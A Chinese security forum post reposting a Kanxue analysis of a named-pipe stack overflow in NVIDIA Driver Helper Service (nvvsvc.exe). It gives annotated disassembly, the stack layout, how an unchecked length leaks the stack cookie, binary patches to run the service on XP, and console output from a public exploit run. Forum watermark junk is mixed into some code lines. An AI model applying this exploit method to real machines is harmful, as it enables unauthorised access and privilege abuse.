TA的每日心情 | 怒 2024-12-14 22:22 |
---|
签到天数: 1631 天 [LV.Master]伴坛终老
|
最近传出NVIDIA显卡存在远程溢出漏洞,其实没有传说中那么严重,有很大的局限性。
1、限于win7系统
2、远程溢出需要系统账号才行
以下转自看雪
【转】NVIDIA Driver Helper Service栈溢出简单说明
-------------------------------------------------------------------------------- -
详情见36x新闻,本来不想发出来的,不过看到36x的人又在放屁吓人.还是发出来吧.
首先这个洞和nvidia的驱动没有一毛钱关系,不是内核级的漏洞.
NVIDIA Driver Helper Service,是一个r3层的服务.
程序是nvvsvc.exe(win7)或nvvsvc32.exe(xp) -
这个程序启动后会创建一个命名管道\\pipe\nsvr,比较特别的是这个管道的dacl是空,也就是说everyone都可以访问.
然后重要的是这个洞其实只针对win7 x64版有效.在win7 x32版上只能够做到infoleak.
xp x32版下0x52命令不支持,同时老版本的xp版nvvsvc32.exe根本没建命名管道.所以也就没360x吹的那么凶,另外这个洞远程利用的情况下对于win7系统关闭了空连接共享所以必须要一个用户名密码(且密码不能为空).
下面来看洞:win7 32位版nvvsvc
- loc_4035D8: ; 取后面数据的长度
- lea eax, [ebp-4022h]
- push ebx ; ebx=2000h
- push eax
- mov [ebp+nNumberOfBytesToWrite], ecx ; ecx=3h
- call sub_43132C ; 返回时如果5200后面是4000h个41h,那么eax=2000h
- pop ecxSecurity. B+ E% A% p& k8 j
- lea eax, [ebp+eax*2+var_4020] ; eax=ebp+4000h-4020h=ebp-20h
- pop ecxT00LS' ~) @7 ]3 u. h
- mov ecx, [eax] ; [ebp-20]=00000000h,ecx=0
- add eax, 8 ; eax=lea [ebp-18h]
- mov [ebp+nNumberOfBytesToWrite], ecx
- mov ecx, [eax-4] ; eax=lea [ebp-1ch],[eax]中的值为00004078h
- push eax ; eax为地址,地址中的值是收到的数据中4078h后面的41 41 ..
- mov [ebp+dwType], eax
- lea eax, [ebp+nNumberOfBytesToWrite]
- push eax ; [eax]的值为0
- lea eax, [ebp-4022h]
- mov [ebp+lpData], ecx ; ecx=00004078h
- push eax ; eax为地址,地址中的值为41 00 41 00....
- cmp dword_491550, edi ; edi=0
- jle short loc_403632
- 然后在下面触发
- loc_40363D:
- mov esi, [ebp+lpData]
- add esp, 0Ch
- push esi ; 4078h,copy的长度
- push [ebp+dwType] ; 地址中的值是收到的数据中4078h后面的41 41 ..
- lea eax, [ebp+Buffer] ; 地址中的值会发送回攻击者
- push eax
- call loc_430720 ; bug!!!
- add esp, 0Ch
- mov [ebp+nNumberOfBytesToWrite], esi
- jmp loc_403900
- 最后再来看内存布局:
- ebp-8044h response buffer ---目的
- ------------------------------recivebuf
- ebp-4024h 52 00
- ebp-4022h 41 41
- ......... 41 41
- ebp-0024h 41 41
- ebp-0022h 00 00
- ebp-0020h 00 00 00 00
- ebp-001ch 20 00 00 00
- ebp-0018h 41 41 41 41
- ebp-0014h 41 41 41 41
- ebp-0010h 41 41 41 41
- ebp-000ch 41 41 41 41
- ebp-0008h 41 41 41 41
- -----------------------------recivebuf
- ebp-0004h cookie
复制代码 漏洞原理:有漏洞的nvvsvc会读recivebuf,判断头两字节是否为52h,如果是跳过52 00后面
的字符串,然后读ebp-1c处的长度(没有任何效验),源为length的偏移往后ebp-18h,并把这些数据移到ebp-8044处的responsebuf,然后调用writefile把数据发给攻击者.如果length定义大点
就会读出ebp-4h处的stack cookie并发给攻击者.
由于32位版下局部变量的内存布局源地址在目的地址的高位,所以这个洞只能造成infoleak.
64位的情况刚好相反,所以能够利用,具体可以见老外的exp不多说.
注:
让win7 32位版的nvvsvc在xp 32位版上运行要改exe的四个地方
1www.t00ls.net4 p! r* J. O3 a6 |3 F7 s
改引入表的reggetvaluew为regclosekey,因为xp下没这个函数
程序入口getcommandlinea调用后改为- jmp 00403988
- 3
- 8D 4D EC lea ecx, [ebp+ThreadId]
- 51 push ecx ; lpThreadId
- 6A 04 push 4 ; CREATE_SUSPENDED
- FF 75 F8 push [ebp+hObject] ; lpParameter
- 89 45 EC mov [ebp+ThreadId], eax
- 68 75 34 40 00 push offset StartAddress ; lpStartAddress
- 50 push eax ; dwStackSize
- 50 push eax ; lpThreadAttributes
- FF 15 98 B0 46 00 call ds:CreateThreadSecurity
- 89 45 F0 mov [ebp+hThread], eax
- E8 F0 E8 FF FF call sub_402313 ; 这个call要注解掉
- loc_403632:
- lea edi, [ebp+lpData]
- call sub_4025D0 ; nop掉
复制代码 附件说明:
nvvsvc32.rar是把win7 32位版的nvvsvc改了下让其可以在xp和win下运行不管你是否有nvidia的显卡.
exp是改的老外的攻击程序,读32位版的cookie.(ps:老外还是很牛的)
- C:\Documents and Settings\mj0011\桌面\新建文件夹\ms0x-0xx\nvidia pipe>exp local ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
- [ () peterwintrsmith]
- - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -
- Action 1 of 9: - CONNECT
- Action 2 of 9: - CLIENT => SERVER
- Written 16416 (0x4020) characters to pipe
- Action 3 of 9: - SERVER => CLIENT
- Read 32 (0x20) characters from pipe
- Action 4 of 9: Building exploit ...
- => Stack cookie 0xb5b04abd:
- Action 5 of 9: - CLIENT => SERVER*
- Written 16416 (0x4020) characters to pipe
- Action 6 of 9: - SERVER => CLIENT
- Read 16384 (0x4000) characters from pipe
- Action 7 of 9: - CLIENT => SERVER
- Written 16416 (0x4020) characters to pipe
- Action 8 of 9: - SERVER => CLIENT1 `/
- !! Error reading from pipe (at least, no data on pipe)
复制代码 |
|